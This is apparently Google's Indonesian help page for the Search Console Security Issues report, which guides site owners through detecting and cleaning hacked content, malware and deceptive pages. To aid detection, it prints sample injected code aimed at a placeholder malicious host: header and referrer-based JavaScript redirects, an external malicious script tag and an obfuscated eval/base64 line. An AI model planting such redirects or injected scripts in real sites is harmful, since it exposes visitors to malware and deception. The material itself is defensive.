Laporan Masalah Keamanan

Jika evaluasi Google menetapkan bahwa situs Anda diretas, atau menunjukkan perilaku yang berpotensi membahayakan pengunjung atau komputer mereka, laporan Masalah Keamanan akan menampilkan temuan Google. Contoh perilaku berbahaya termasuk serangan phishing atau penginstalan malware maupun software yang tidak diinginkan pada komputer pengguna.

Halaman atau situs yang terkena dampak masalah keamanan dapat muncul dengan label peringatan di hasil penelusuran atau halaman peringatan interstisial di browser ketika pengguna mencoba membukanya.

Buka laporan Masalah Keamanan

 

Security issues report in Search Console - Google Search Console Training

Apa itu masalah keamanan?

Masalah keamanan yang dilaporkan di sini termasuk dalam kategori berikut:

  • Konten yang diretas: Ini adalah konten yang ditempatkan di situs tanpa izin Anda karena kerentanan keamanan pada situs. Untuk melindungi para pengguna, Google berupaya semaksimal mungkin agar konten yang diretas tidak masuk dalam hasil penelusuran. Pelajari lebih lanjut.
  • Malware dan software yang tidak diinginkan: Software ini dirancang untuk merusak perangkat atau penggunanya, yang melakukan praktik menipu atau tidak terduga, atau yang berdampak negatif pada pengguna. Malware dapat diinstal oleh peretas atau pemilik situs. Pelajari lebih lanjut.
  • Manipulasi psikologis: Ini adalah konten yang menipu pengunjung agar melakukan hal berbahaya, seperti mengungkapkan informasi rahasia atau mendownload software. Pelajari lebih lanjut.

Apakah situs saya mengalami masalah keamanan?

Jika terdapat masalah keamanan, Anda akan melihat jumlah semua masalah keamanan pada situs di bagian atas laporan.

Jika situs Anda tidak memiliki masalah keamanan, tanda centang hijau dan pesan yang sesuai akan muncul.

Tapi saya baru saja membeli situs ini!

Jika Anda baru membeli sebuah situs yang sebelumnya memiliki masalah keamanan, perbaiki masalah yang tercantum dalam laporan Masalah Keamanan. Kemudian, dalam permintaan pertimbangan ulang, sampaikan bahwa Anda baru membeli situs itu dan bahwa situs tersebut sekarang sudah mematuhi kebijakan spam untuk penelusuran web Google.

Saya tidak dapat memunculkan kembali masalahnya

Google SafeBrowsing menampilkan peringatan kepada pengguna berdasarkan konteks penjelajahan. Itulah sebabnya Anda mungkin dapat atau tidak dapat memunculkan kembali peringatannya. Namun, sebaiknya Anda mengandalkan laporan Masalah Keamanan sebagai sumber tepercaya untuk memverifikasi apakah ada masalah keamanan di situs Anda, atau apakah masalah tersebut telah diperbaiki.

Halaman mana saja yang terpengaruh?

Perluas deskripsi masalah untuk melihat daftar sampel URL yang terpengaruh. Daftar ini belum tentu lengkap, karena hanya berisi sampel halaman di situs Anda yang terpengaruh oleh masalah yang dipilih. Terkadang Anda dapat mengalami masalah keamanan tanpa contoh URL; hal ini bukan berarti tidak ada halaman yang terpengaruh, hanya saja kami tidak dapat membuat sampel karena beberapa alasan.

Detail masalah menampilkan tanggal ketika masalah pertama kali terdeteksi di situs Anda, serta deskripsi singkat dan link untuk mempelajari masalah tersebut lebih lanjut.

Memperbaiki masalah

Untuk memperbaiki masalah keamanan di situs Anda:

  1. Perluas deskripsi masalah pada laporan Masalah Keamanan.
  2. Baca deskripsi masalah dan ikuti link "Pelajari lebih lanjut" untuk informasi mendetail dan langkah untuk memperbaiki masalah tersebut. (Link pelajari lebih lanjut mengarah ke deskripsi di bagian bawah halaman ini.)
  3. Gunakan sampel halaman terpengaruh yang disediakan di bagian detail untuk memecahkan dan memperbaiki masalah Anda. Daftar ini belum tentu lengkap, karena hanya berisi sampel halaman di situs Anda yang terpengaruh oleh masalah ini. Anda mungkin memiliki masalah keamanan tanpa contoh URL; hal ini bukan berarti tidak ada halaman yang terpengaruh, hanya saja kami tidak dapat membuat sampel karena beberapa alasan.
  4. Perbaiki masalah di seluruh situs Anda. Memperbaiki masalah hanya pada beberapa halaman tidak akan membuat sebagian halaman tersebut dikembalikan ke hasil penelusuran.
  5. Jika laporan mencantumkan beberapa masalah keamanan yang memengaruhi situs Anda, perbaiki semuanya.
  6. Uji perbaikan Anda.
  7. Ketika semua masalah yang tercantum dalam laporan diperbaiki di semua halaman, pilih Minta Peninjauan di laporan Masalah Keamanan. Dalam permintaan pertimbangan ulang, uraikan perbaikan yang sudah Anda lakukan. Permintaan yang baik mencakup tiga hal:
    • Menjelaskan masalah kualitas yang sebenarnya di situs Anda.
    • Menjelaskan langkah-langkah yang telah Anda lakukan untuk memperbaiki masalah.
    • Mendokumentasikan hasil upaya Anda.
  8. Peninjauan pertimbangan ulang dapat memerlukan beberapa waktu (lihat di bawah). Anda akan diberi tahu progresnya melalui email. Setelah mengirim permintaan, Anda akan menerima pesan konfirmasi yang memberitahukan bahwa peninjauan sedang berlangsung. Jangan kirim ulang permintaan sebelum Anda menerima keputusan akhir tentang permintaan yang belum terselesaikan.

Berapa lama waktu yang diperlukan untuk peninjauan pertimbangan ulang?

Sebagian besar peninjauan pertimbangan ulang dapat memerlukan waktu beberapa hari atau beberapa minggu, meskipun dalam beberapa kasus, seperti permintaan pertimbangan ulang terkait link, mungkin membutuhkan waktu lebih lama dari biasanya untuk ditinjau. Setelah permintaan kami terima, Anda akan menerima email pemberitahuan sehingga Anda bisa mengetahui bahwa permintaan tersebut aktif. Anda juga akan menerima email setelah peninjauan selesai.

Harap jangan mengirim ulang permintaan sebelum Anda menerima keputusan akhir tentang permintaan yang belum terselesaikan. Mengajukan permintaan pertimbangan ulang ketika masalah belum diperbaiki dapat menyebabkan waktu penyelesaian untuk permintaan berikutnya menjadi lebih lama, atau bahkan membuat Anda ditandai sebagai pelanggar berulang.

 

Daftar masalah keamanan

Berikut adalah daftar masalah keamanan yang mungkin terjadi, beserta informasi cara memperbaiki masing-masing masalah. Masalah dikelompokkan sebagai error  atau peringatan .

Penjelasan tentang masalah keamanan - Pelatihan Google Search Console

Diretas: Malware
Situs Anda telah terinfeksi, atau menghosting, malware dari peretas berbahaya. Malware adalah software atau aplikasi seluler yang dirancang khusus untuk merusak komputer, perangkat seluler, software yang dijalankan, atau penggunanya. Baca selengkapnya tentang malware.

1. Konfirmasi masalah

Kunjungi beberapa contoh URL di browser Chrome. Anda mungkin akan melihat peringatan Berbahaya di menu navigasi browser, serta halaman interstisial peringatan, seperti ini:

2. Pertimbangkan apakah Anda dapat memperbaikinya

Untuk memperbaiki masalah malware di situs Anda, diperlukan kemampuan untuk membaca serta memahami kode, dan mungkin konfigurasi server web untuk situs Anda. Jika Anda merasa hal ini di luar kemampuan Anda, baca Membentuk tim dukungan untuk mempelajari cara menemukan seseorang untuk membantu Anda memperbaiki masalah ini.

3. Lakukan diagnosis dan perbaiki masalah malware Anda

Baca bagian perbaikan malware dari panduan peretasan di web.dev untuk mempelajari cara mengidentifikasi jenis malware dan memperbaiki masalah. Perhatikan bahwa situs Anda mungkin terinfeksi lebih dari satu jenis malware; telitilah dalam mendiagnosis dan membersihkan situs Anda. Konfirmasikan adanya masalah pada salah satu contoh URL yang ditampilkan dalam laporan Masalah Keamanan.

4. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

5. Ikuti praktik terbaik untuk menjaga keamanan situs Anda

Baca pedoman ini tentang cara mencegah situs Anda diretas, dan cara memantau keamanan situs.

Diretas: Injeksi kode

Peretas telah menyusupi situs Anda dan menginjeksi kode berbahaya di halaman Anda. Contohnya termasuk pengalihan ke situs berbahaya atau menjalankan mining software mata uang kripto di browser Anda saat halaman terbuka.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

2. Konfirmasi masalah

Konfirmasikan adanya masalah pada salah satu contoh URL yang diberikan untuk peringatan ini.

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Peretas mungkin telah menginjeksikan kode berbahaya langsung ke file HTML di situs (misalnya, pengalihan JavaScript) atau ke file yang menghasilkan konten situs Anda (misalnya, file PHP).

Ambil halaman yang disusupi yang tercantum dalam laporan, lalu periksa jawabannya. Peretas dapat menggunakan beberapa macam teknik untuk mengalihkan pengunjung dari situs Anda ke situs mereka; berikut beberapa contohnya:

  • Pengalihan:​
    • Pengalihan header: Peretas dapat mengalihkan pengunjung dengan memodifikasi file konfigurasi server Anda. File konfigurasi server biasanya mengizinkan administrator situs menentukan pengalihan URL untuk halaman tertentu atau direktori di situs. Misalnya, di server Apache, dapat berupa file .htaccess serta httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Pengalihan JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • JavaScript berbahaya yang dimuat dari situs lain:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Kode berbahaya yang dikaburkan untuk menghindari deteksi:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Telusuri kode yang mencurigakan dalam respons dan di situs Anda. Istilah penelusuran yang berguna dapat berupa "search", "eval", "base64_decode", dan "unescape".

3. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan cadangan terakhir yang tidak terinfeksi atau Anda dapat menghapus sendiri konten yang berisi spam.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.

4. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Diretas: Injeksi konten

Peretas telah menambahkan link atau teks berisi spam ke halaman situs Anda. Konten yang diinjeksikan mungkin berisi istilah farmasi atau spam lain yang tidak terkait dengan konten situs.

Biasanya, peretas memodifikasi situs Anda dengan salah satu cara berikut:

  • Dengan mengakses direktori yang tidak aman di server Anda. Contohnya, Anda mungkin tidak sengaja meninggalkan sebuah direktori dengan izin terbuka.
  • Dengan memanfaatkan kerentanan pada software yang berjalan di situs Anda, misalnya sistem pengelolaan konten. Misalnya, Anda mungkin menjalankan versi Drupal, Joomla!, atau Wordpress yang lebih lama dan tidak aman.
  • Dengan meretas plugin pihak ketiga yang digunakan di situs Anda, seperti penghitung jumlah pengunjung.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

2. Konfirmasi masalah

Konfirmasikan adanya masalah pada salah satu contoh URL yang diberikan untuk peringatan ini.

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Ambil beberapa halaman di situs Anda dan telusuri konten atau link mencurigakan pada respons yang tidak Anda tambahkan. Misalnya, telusuri istilah farmasi atau spam seperti "viagra" atau "mendapatkan uang".

3. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan cadangan terakhir yang tidak terinfeksi, atau Anda dapat menghapus konten dan link yang berisi spam dari setiap halaman. Pastikan untuk memperbaiki semua contoh peretasan yang ditampilkan pada laporan Masalah Keamanan. Selain itu, telusuri halaman lain di situs Anda yang mungkin diretas menggunakan penelusuran "site:" di Google dan dengan menelusuri file sumber di situs Anda.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.

4. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Diretas: Injeksi URL

Peretas telah membuat halaman baru di situs Anda, sering kali berisi kata-kata atau link berisi spam. Terkadang, halaman baru ini berisi kode yang menjalankan hal-hal yang tidak Anda inginkan, seperti mengalihkan pengguna ke situs lain atau melibatkan server web Anda dalam serangan denial of service terhadap situs lain.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

2. Konfirmasi masalah

Konfirmasikan adanya masalah pada salah satu contoh URL yang diberikan untuk peringatan ini.

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Periksa contoh URL yang tercantum dalam laporan untuk melihat apakah URL tersebut aktif. Anda mungkin belum membuat halaman ini sendiri, jadi Anda harus menghapus halaman di situs Anda, atau menghilangkan kode yang menghasilkan halaman secara otomatis. Baca cara menemukan dan membersihkan halaman ini dari situs Anda.

Anda juga dapat melakukan penelusuran "site:" untuk menemukan halaman yang belum dibuat.

  • Pada situs kecil, Anda dapat menelusuri [site:example.com] di Google Penelusuran untuk melihat daftar halaman yang telah kami indeks, agar Anda dapat melihat apakah ada halaman yang belum Anda buat.
  • Untuk situs lebih besar, Anda dapat menggunakan kueri yang lebih spesifik, misalnya:
    • [site:example.com farmasi] - Menampilkan daftar semua halaman yang memuat kata "farmasi" di example.com. Kata ini dapat diganti dengan istilah spam umum lainnya.
    • [site:example.com/wp-admin/] - Buat daftar semua halaman di bagian administrator situs dari situs WordPress Anda.

3. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti direktori yang terpengaruh dengan cadangan terakhir yang tidak terinfeksi atau Anda dapat menghapus halaman yang tidak diinginkan serta file atau fungsi apa pun yang digunakan oleh peretas untuk membuatnya.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.

4. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Halaman penipuan

Situs Anda berisi konten yang menipu pengunjung agar mereka melakukan sesuatu yang berbahaya, seperti mengungkapkan informasi rahasia atau mendownload software. Google Safe Browsing melindungi pengguna web dengan memperingatkan mereka sebelum mengunjungi halaman yang secara konsisten menampilkan konten yang menipu.

Halaman juga dianggap menipu ketika:

  • Bertindak, atau terlihat dan bernuansa seolah-olah seperti entitas tepercaya, misalnya, perangkat atau browser Anda sendiri atau situs itu sendiri, atau
  • Mencoba menipu Anda agar melakukan tindakan yang biasanya dilakukan untuk entitas tepercaya, misalnya, membagikan sandi,  menghubungi dukungan teknis, atau mendownload software.

Jenis konten yang menipu ini disebut manipulasi psikologisPelajari manipulasi psikologis lebih lanjut atau lihat contoh halaman penipuan.

Memperbaiki masalah

1. Konfirmasi masalah

Buka contoh halaman untuk mencari konten yang menipu. Anda dapat menggunakan alat Inspeksi URL untuk melihat situs Anda dalam tampilan seluler dan desktop.

2. Perbaiki halaman Anda

Perbaiki setiap halaman yang terlibat dalam manipulasi psikologis. Jika Anda yakin Safe Browsing salah mengklasifikasikan halaman web, harap laporkan di sini.

3. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Resource tersemat yang menipu

Situs Anda menyertakan iklan yang menipu atau resource tersemat yang mengelabui pengunjung agar melakukan sesuatu yang berbahaya, seperti mengungkapkan informasi rahasia atau mendownload software yang tidak diinginkan. Konten yang menipu dapat dimasukkan melalui resource yang tersemat di halaman, seperti gambar, komponen pihak ketiga, atau iklan. Google Safe Browsing melindungi pengguna web dengan memperingatkan mereka sebelum mengunjungi halaman yang secara konsisten menampilkan konten yang menipu.

Terkadang konten ini dapat dilihat oleh pengguna di halaman host; dalam kasus lain, situs host tidak berisi iklan yang dapat dilihat, tetapi mengarahkan pengguna ke halaman berbahaya melalui pop-up, pop-under, atau jenis pengalihan lainnya. Biasanya, jenis konten yang disematkan ini akan mengakibatkan pelanggaran kebijakan untuk halaman host.

Jenis konten yang menipu ini disebut manipulasi psikologisPelajari manipulasi psikologis lebih lanjut atau lihat contoh resource tersemat yang menipu.

Memperbaiki masalah

1. Konfirmasi masalah

Buka contoh halaman untuk mencari konten yang menipu. Pastikan tidak ada iklan, gambar, atau resource pihak ketiga tersemat lainnya di halaman situs Anda yang menipu. Perlu diperhatikan bahwa jaringan iklan dapat merotasi iklan yang ditampilkan di halaman situs Anda. Oleh karena itu, Anda mungkin perlu memuat ulang halaman beberapa kali sebelum melihat kemunculan iklan manipulasi psikologis apa pun. Beberapa iklan dapat ditampilkan secara berbeda di perangkat seluler dan komputer desktop. Anda dapat menggunakan alat Inspeksi URL untuk melihat situs Anda dalam tampilan seluler dan desktop.

2. Hapus iklan atau resource yang menipu

Periksa resource pihak ketiga yang dimasukkan ke dalam situs Anda. Pastikan iklan, gambar, atau resource pihak ketiga tersemat lainnya di halaman situs bukan merupakan konten menipu. Perbaiki setiap halaman yang terlibat dalam manipulasi psikologis

3. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Download berbahaya

Situs Anda menawarkan download yang menurut Google Safe Browsing merupakan malware atau software yang tidak diinginkan. Browser Chrome dapat menampilkan peringatan ketika pengguna mengunjungi situs Anda. Download harus dihapus dari situs Anda agar peringatan hilang.

1. Konfirmasi masalah

Lihat beberapa contoh halaman di situs Anda untuk mengonfirmasi ada tidaknya download ini.

2. Lakukan evaluasi masalah

  • Jika download ini disengaja, hapus download tersebut dari situs Anda dan langsung Minta peninjauan.
  • Jika Anda tidak mengetahui adanya download, situs Anda mungkin telah diretas. Perbaiki masalah peretasan pada situs Anda, lalu cari dan hapus hasil download-nya

3. Bersihkan situs Anda

Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali. Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan cadangan terakhir yang tidak terinfeksi atau Anda dapat menghapus sendiri konten yang berisi spam. Gunakan software antivirus untuk memindai biner dan konten lain yang dihosting di situs Anda. Software antivirus menemukan berbagai jenis malware dan software yang tidak diinginkan, tetapi sayangnya belum semua jenis. Mengirim software Anda ke program antivirus (atau layanan konsolidasi antivirus, seperti VirusTotal) akan memberikan indikator potensi masalah dengan software. Google Safe Browsing menerapkan kriterianya sendiri untuk menentukan apakah program atau biner adalah software yang tidak diinginkan atau malware.

4. Konfirmasi perbaikan Anda

Pastikan situs Anda mematuhi Kebijakan Software yang Tidak Diinginkan.

5. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Link ke download berbahaya

Situs Anda tertaut ke situs yang menawarkan download yang menurut Google Safe Browsing merupakan malware atau software yang tidak diinginkan. Browser Chrome dapat menampilkan peringatan ketika pengguna mengunjungi situs Anda. Link yang mengarah ke situs berbahaya harus dihapus agar peringatan hilang.

1. Konfirmasi masalah

Lihat beberapa contoh halaman di situs Anda untuk mengonfirmasi ada tidaknya download ini. Dalam beberapa kasus, peretas dapat menyembunyikan link ini jika mereka merasa bahwa Anda adalah pemilik situs. Coba kunjungi contoh URL dengan alat Inspeksi URL, atau login dengan akun yang berbeda atau di komputer lain.

2. Lakukan evaluasi masalah

Jika link ini disengaja, hapus link tersebut dari situs Anda dan langsung Minta peninjauan.

Jika Anda tidak mengetahui adanya link ini, situs Anda mungkin telah diretas.

3. Pertimbangkan apakah Anda dapat memperbaikinya

Jika Anda telah diretas, lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

4. Bersihkan situs Anda

Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali. Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan cadangan terakhir yang tidak terinfeksi atau Anda dapat menghapus sendiri konten yang berisi spam.

5. Konfirmasi perbaikan Anda

Pastikan situs Anda mematuhi Kebijakan Software yang Tidak Diinginkan.

6. Minta peninjauan

Setelah mengonfirmasi bahwa masalah di situs Anda telah diperbaiki, minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Penagihan seluler yang tidak jelas

Jika Google mendeteksi bahwa situs Anda tidak memberikan informasi yang cukup kepada pengguna tentang biaya seluler, Chrome dapat menampilkan peringatan sebelum pengguna memuat halaman yang mengenakan biaya.

1. Konfirmasi masalah

Kunjungi contoh URL yang tercantum dalam laporan untuk melihat halaman mana yang memiliki perilaku penagihan seluler yang tidak jelas. Tinjau pedoman penagihan seluler di sini.

2. Perbaiki masalah

Perbaiki halaman Anda agar sesuai dengan praktik terbaik penagihan seluler.

3. Minta peninjauan

Saat Anda mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan dalam laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

 Phishing kemungkinan terdeteksi pada login pengguna

Beberapa halaman di situs Anda diduga berisi phishing, dan peringatan penggunaan ulang  sandi pop-up ditampilkan saat pengguna mencoba login. Google Safe Browsing melindungi pengguna web dengan menampilkan peringatan saat pengguna web tersebut menggunakan kembali sandi tersimpan mereka dalam kasus semacam ini.

Peretas terkadang dapat mengelabui pengguna agar menggunakan kembali sandi mereka di halaman yang mirip dengan login situs resmi untuk mencuri informasi pengguna. Jenis konten yang menipu ini disebut manipulasi psikologis. Pelajari lebih lanjut manipulasi psikologis atau lihat contoh halaman penipuan.

1. Konfirmasi masalah

Buka contoh halaman untuk mencari konten yang menipu. Anda dapat menggunakan alat Inspeksi URL untuk melihat situs Anda dalam tampilan seluler dan desktop.

2. Perbaiki masalah

Perbaiki setiap halaman yang terlibat dalam manipulasi psikologis. Jika Anda yakin bahwa situs Anda telah diretas, baca Panduan Bantuan untuk Situs yang Diretas kami. Jika Anda yakin fitur Safe Browsing telah salah mengklasifikasikan halaman web, laporkan di sini.

3. Minta peninjauan

Saat Anda mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan dalam laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

 Download yang tidak umum

Situs Anda menawarkan download yang belum pernah dilihat oleh Google Safe Browsing. Browser Chrome mungkin memperingatkan bahwa file yang didownload tersebut tidak umum dan berpotensi membahayakan. Peringatan ini akan hilang secara otomatis jika Google Safe Browsing memverifikasi bahwa file aman. Perhatikan bahwa contoh URL tidak selalu diberikan untuk masalah ini.

Masalah ini tidak akan mencegah halaman atau situs Anda muncul di hasil Google Penelusuran, tetapi akan menampilkan peringatan di browser Chrome saat pengguna awalnya meminta untuk mendownload file yang tidak diketahui.

1. Perbaiki masalah

Temukan dan konfirmasi apakah download Anda sesuai dengan pedoman download.

  • Hapus download di situs Anda jika ada yang melanggar pedoman ini.
  • Jika download tidak melanggar pedoman ini, Anda tidak perlu menghapusnya.

2. Minta peninjauan

Setelah selesai menghapus file (atau memastikan bahwa download sesuai dengan pedoman download), minta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu. Meskipun tidak ada permintaan peninjauan, Google nantinya akan mengevaluasi sebagian besar download dan mengklasifikasikannya sebagai aman atau berbahaya. Namun, Anda dapat membantu mempercepat proses evaluasi dengan mengajukan permintaan peninjauan.

 

Apa perbedaan antara laporan Tindakan Manual dan laporan Masalah Keamanan?

Laporan Tindakan Manual mencantumkan masalah yang terdeteksi di suatu halaman atau situs yang utamanya mencoba memanipulasi indeks penelusuran kami, tetapi tidak terlalu berbahaya bagi pengguna. Sebagian besar masalah yang dilaporkan di sini akan membuat halaman atau situs diberi peringkat rendah atau dihilangkan dari hasil penelusuran tanpa indikasi visual apa pun terhadap pengguna.

Laporan Masalah Keamanan mencantumkan indikasi bahwa situs telah diretas atau perilaku di situs yang dapat berpotensi membahayakan pengunjung atau komputer mereka: misalnya, serangan phishing, atau penginstalan malware atau software yang tidak diinginkan di komputer pengguna. Halaman ini dapat muncul dengan label peringatan di hasil penelusuran, atau browser dapat menampilkan halaman peringatan interstisial saat pengguna mencoba mengunjunginya.

Apakah ini membantu?

Bagaimana cara meningkatkannya?

Perlu bantuan lain?

Coba langkah-langkah selanjutnya berikut:

Telusuri
Hapus penelusuran
Tutup penelusuran
Aplikasi Google
Menu utama
3533368661017443068
true
Pusat Bantuan Penelusuran
true
true
true
true
true
83844
false
false